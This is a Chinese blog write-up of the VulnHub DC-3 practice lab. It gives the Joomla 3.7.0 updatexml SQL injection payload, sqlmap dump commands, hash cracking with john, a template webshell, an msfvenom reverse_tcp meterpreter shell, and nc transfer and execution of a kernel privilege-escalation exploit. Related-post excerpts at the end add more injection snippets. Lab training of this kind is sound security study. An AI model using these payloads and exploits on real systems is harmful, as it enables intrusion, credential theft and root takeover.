vulnhub 入门DC-3

于 2023-01-01 02:41:27 发布
阅读量314 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52780973/article/details/128510250
版权
本文介绍了通过Vulnhub的DC-3靶机进行安全渗透测试的过程。首先,利用80端口的SQL注入漏洞(针对Joomla 3.7.0),获取管理员密码并使用John进行爆破。接着,通过目录扫描找到管理后台,使用Metasploit框架进行攻击。在获取部分权限后,通过内核版本查找并利用提权exploit,借助nc命令传输文件。虽然初次尝试未成功,但最终找到了适合内核版本的exp并成功提权。此外,文章还提及了使用joomscan工具进行扫描,以及如何利用MSFVenom创建反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先设置成下面的样子再运行

在这里插入图片描述

开放80端口,去访问一下。搜索对应CMS漏洞,存在sql注入漏洞,Joomla 3.7.0 SQL注入漏洞。payload

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

在这里插入图片描述

sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" --dbs		//爆数据库
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb --tables		//爆表名
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb -T '#__users' --columns		//爆列名
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb -T '#__users' -C 'username' --dump		//爆用户名
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb -T '#__users' -C 'password' --dump		//爆密码

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

得到的密码写入1.txt,使用john爆破

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > 1.txt
john 1.txt

在这里插入图片描述

得到密码snoopy。目录扫描到管理后台,administrator。登录

在这里插入图片描述

msf攻击,需要登录到后台后才可以利用

在这里插入图片描述

在这里插入图片描述

python -c 'import pty; pty.spawn("/bin/bash")'		得到交互shell
uname -r

查看内核版本,searchsploit搜索,进行提权

在这里插入图片描述

刚好有nc命令,反向传输文件

在这里插入图片描述

成功,接下来编译执行,发现失败,继续传44300.c,编译运行,同样发现不行

uname -a		找版本
searchsploit Ubuntu 16.04

继续根据版本号来找exp,尝试这个

在这里插入图片描述

在这里插入图片描述

有希望,到github下载发现404,但是在下面这找到

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/39772.zip

nc传输

nc -nv <kali_ip> 1234 > 39772.c		目标机执行
nc -lp 1234 < 39772.c		kali执行

在这里插入图片描述

unzip 39772.zip -d ./		解压.zip文件
cd 39772
tar -xvf exploit.tar		解压.tar文件
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

运行完后等待一会,提权成功

在这里插入图片描述

涉及到的其他方法

使用工具joomscan扫描版本、目录等,获取一些信息

joomscan --url <url>

在这里插入图片描述

searchsoloit joomla 3.7.0

可以查看有哪些漏洞,发现有两个漏洞符合当前版本

在这里插入图片描述

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt,文件给出漏洞信息以及利用方法

在这里插入图片描述

拿shell的时候可以从后台管理入手,在模板中修改index.php文件,添加一句话

在这里插入图片描述

在这里插入图片描述

至于路径,可以用dirb或dirsearch扫描到

在这里插入图片描述

连接成功,之后就可以很方便在蚁剑上传文件到服务器

在这里插入图片描述

利用msfvenom建立反弹shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=4444 > msfshell.php

在这里插入图片描述

拖到本机桌面后再拖到/var/www/html/目录

在这里插入图片描述

之后进入msfconsole,输入下列命令

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost <kali_ip>
set lport 4444
run

浏览器访问

在这里插入图片描述

vulnhub 入门DC-1
weixin_52780973的博客
12-31 401
vulnhub靶场 入门 DC-1 攻防
VulnhubDC-2(新手入门
最新发布
zhangshuaiijie的博客
06-12 197
这靶机有点难,每个用户的权限都不一样,rbash绕过,git提权。
sql注入学习(3)第5和6关报错注入,
qfslyy的博客
12-26 542
今天exp注入时发现数据库版本不对,老版本phpstudy不能换数据库版本,于是换了小皮,但是怎么都连不上数据库,最后发现时php版本忘换了,gan。 先了解一下别的注入: exp和updatexml exp: and exp(~(select xfrom(select x from x.x))x)) 第一关举例: 使用这种方式获得数据库名。欧克了 报错注入: updatexml(要操作的文件名,(构造一个xpath语法),新值) updatexml1,(concat0x23,(database())
dc-3 靶机渗透学习
..
03-17 3747
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误。 vim /etc/network/interfacers 改成 vim /etc/network/interfaces Vulnhub靶机检测不到IP地址_阿帅start的博客-优快云博客_靶机没有ip 信息收集 使用nmap对当前网段进行扫描 nmap -sP 192.168.202.0/24 在排除kali攻击机和物理机ip后,对192.168.2...
靶机渗透练习71-DC3
hirak0的博客
04-21 1197
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-32,312/ Description DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners i
DC系列】DC-3靶机渗透练习
serendipity1130的博客
08-30 295
1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口,开启了80端口,Joomla框架 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 使用dirsearch扫到后台路径和README.txt文件,获得了版本: python dirsearch.py -u http://192.168.225.142/ -e * -i 200 3.发现版本号为3.7,百度查出有一个注入漏洞:
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 6319
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
Vulnhub入门实战1-DC:1
Yisonj的博客
11-25 2579
Vulnhub入门实战1-DC:1 前言 为了更好的学习Kali渗透测试相关内容,近期接触到Volunhub平台,一个免费提供漏洞靶机进行渗透测试的平台。 实验准备 DC:1靶机下载 kali系统(本实验采用kali-linux-2020-3-live-amd64-iso) 靶机导入,采用VirtualBox和VMware均可 虚拟机准备,将目标靶机DC:1和攻击机kali系统设置为在同一局域网内,本实验采用(NAT模式) 实验目的 查看DC:1的介绍 DC-1是一个专门构建的易受攻
[渗透测试篇]VulnhubDC-1靶机从入门到入坑
qq_43668710的博客
04-16 1359
0x01 前言 这是我第一次真正开始接触渗透测试的靶场,因为之前见过DC系列的靶机,于是我就决定以DC系列的靶机开始入门渗透测试,尽管目前都是基于大佬们的文章进行复现,但这丝毫没有使我的兴趣有丝毫减少! DC-1 实验环境 攻击机:kali 目标机:DC-1 涉及工具 Netdiscover Droopescan Searchsploit MetaSploit 0x02 渗透思路 思路1: ...
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
一道综合渗透题引发的updatexml()注入思考
热门推荐
Grey的博客
05-09 1万+
MYSQL数据库updatexml报错注入UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格...
mysql 注入 update_关于update的一个小注入
weixin_32698563的博客
02-01 1042
昨天在小密圈看到ph师傅发了一段code,当时想的是利用join方法去进行报错注入,结果晚上一看,乐师傅已经解决了QAQ(膜,自己也写一下关于这段code的分析:code区域:$link = mysqli_connect('localhost', 'root', 'root');mysqli_select_db($link, 'code');$table = addslashes($_GET['t...
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试
sun1296825481的博客
12-11 3078
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试 本漏洞测试使用的是虚拟机Ubuntu 18.04 LTS 一、环境搭建 1、docker的安装 .更新apt包索引 sudo apt-get update .安装以下包以使apt可以通过HTTPS使用存储库(repository) sudo apt-get install -y apt-transport-http...
vulhub漏洞复现32_Joomla
weixin_44193247的博客
02-04 1130
vulhub漏洞复现练习篇
MySQL updatexml报错注入
酉酉的博客
10-13 6228
updatexml () 函数 updatexml(XML_document, XPath_string, new_value); 参数 描述 XML_document String格式,为XML文档对象的名称,文中为Doc XPath_string Xpath格式的字符串 new_value String格式,替换查找到的符合条件的数...
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
EC_Carrot的博客
07-07 272
漏洞复现 也不知道是不是vulhub环境问题,搭建不起来,这个漏洞也比较简单,直接放poc就可以了。 访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)即可看到报错信息 ...
SQL报错注入攻击中的updatexml()函数
weixin_45738112的博客
03-27 1919
SQL报错注入攻击中的updatexml()函数 sql报错注入是程序将错误信息输出到页面上,如果get获取参数拼接到SQL语句中,执行成功,正常输出;如果出错,PHP代码里会执行一个echo mysqli_error(con)的语句(这里只是举个普遍例子)mysqlierror(con)的语句(这里只是举个普遍例子)mysqli_error(con)的语句(这里只是举个普遍例子)mysqlie​...
MYSQL updatexml报错注入
weixin_30778805的博客
08-20 383
首先了解下updatexml()函数 UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值